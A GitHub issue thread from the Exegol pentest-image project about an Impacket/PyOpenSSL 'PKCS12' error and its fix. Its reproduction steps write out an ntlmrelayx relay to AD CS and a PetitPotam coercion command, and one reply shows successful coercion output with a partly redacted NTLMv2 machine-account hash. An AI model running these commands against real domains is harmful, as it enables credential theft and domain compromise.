ThePorgs / Exegol-images

Docker images of the Exegol project
https://exegol.readthedocs.io/
GNU General Public License v3.0

[BUG] Impacket 'OpenSSL.crypto' has no attribute 'PKCS12' #367

Closed chemoms closed 3 months ago

chemoms commented 4 months ago

Describe the bug

There is an issue with the PyOpenSSL library used by Impacket. Indeed, we encounter the following error when trying, for example, to retrieve an ADCS certificate:

AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

To resolve the problem: pipx inject impacket PyOpenSSL==24.0.0 (I haven't tested with a higher version)

Steps To Reproduce

1) ntlmrelayx -debug -smb2support --target http://cert/certsrv/certfnsh.asp --adcs --template DomainController
2) petitpotam.py -u user -p passwd attacker_ip dc_ip

Exegol Wrapper Version

[D] Pip installation: On ✔                                                      
[D] Git source installation: Off 🪓                                             
[D] Host OS: Linux (Kernel)                                                     
[D] Arch: amd64                                                                 
[D] Raw arch: x86_64                                                            
[D] Docker desktop: Off 🪓                                                      
[D] Shell type: Linux                                                           
[D] Last wrapper update check: 18/06/2024                                       

[*] Exegol is currently in version v4.3.4

Exegol container information

│             Name │ temp                                                      │
│            Image │ full - v.3.1.4 (Up to date) (amd64)                       │
├──────────────────┼───────────────────────────────────────────────────────────┤
│      Credentials │ root : <secret>                     │
│   Remote Desktop │ Off 🪓                                                    │
│    Creation date │ 24/06/2024 08:50                                          │
│      Console GUI │ On ✔ (X11)                                                │
│          Network │ host                                                      │
│         Timezone │ On ✔                                                      │
│ Exegol resources │ On ✔ (/opt/resources)                                     │
│     My resources │ On ✔ (/opt/my-resources)                                  │
│    Shell logging │ On ✔ (/workspace/logs)                                    │
│       Privileged │ On 🔥                                                     │
│        Workspace │ Dedicated (/workspace)                                    │
│             Envs │ DISPLAY=:0.0                                              │
│                  │ _JAVA_AWT_WM_NONREPARENTING=1                             │
│                  │ QT_X11_NO_MITSHM=1                                        │
│                  │ EXEGOL_START_SHELL_LOGGING=asciinema                      │
│                  │ EXEGOL_START_SHELL_COMPRESS=True                          │
│                  │ EXEGOL_RANDOMIZE_SERVICE_PORTS=true                       │
│                  │ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/… │

Exception

No response

Additional context

No response

Anything else?

No response

QU35T-code commented 3 months ago

Hello @chemoms,

Can you give more details (code snippet / capture)? On the nightly image it works correctly with petitpotam + responder. I'll try on the full image to see if the problem exists.

root@exegol-repro /workspace # petitpotam.py -u 'username' -p 'REDACTED' 10.10.10.6 192.168.10.100

              ___            _        _      _        ___            _
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_|
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)

                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.10.100[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 192.168.10.100
[SMB] NTLMv2-SSP Username : RED\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::RED:1122334455667788:EB2C50E3962CBCA25B799B2F8BA10935:0101000000000000803D02719ED6DA017AEC2FC495318D9B0000000002000800480057004C00580001001E00570049004E002D00440039004A005100460057004F0030003700380[...REDACTED...]

Is the error ntlmrelay or petitpotam? In the case of ntlmrelay, I'll try to reproduce with an ADCS.

ShutdownRepo commented 3 months ago

The issue has been fixed upstream: https://github.com/fortra/impacket/issues/1716

ThePorgs' fork has been synced (https://github.com/ThePorgs/impacket/commit/18d25933e3b3b45fa4c35724ac9c7e11fcfa8207), it should fix the issue on the next nightly build, and following version releases.

Closing the issue as it will most certainly be fixed.

Please feel free to test on the next Exegol images, and re-open the issue if it persists.

Thank you for reporting the bug @chemoms ✌️

chemoms commented 2 months ago

Thanks for your work !!! ❤️❤️❤️❤️❤️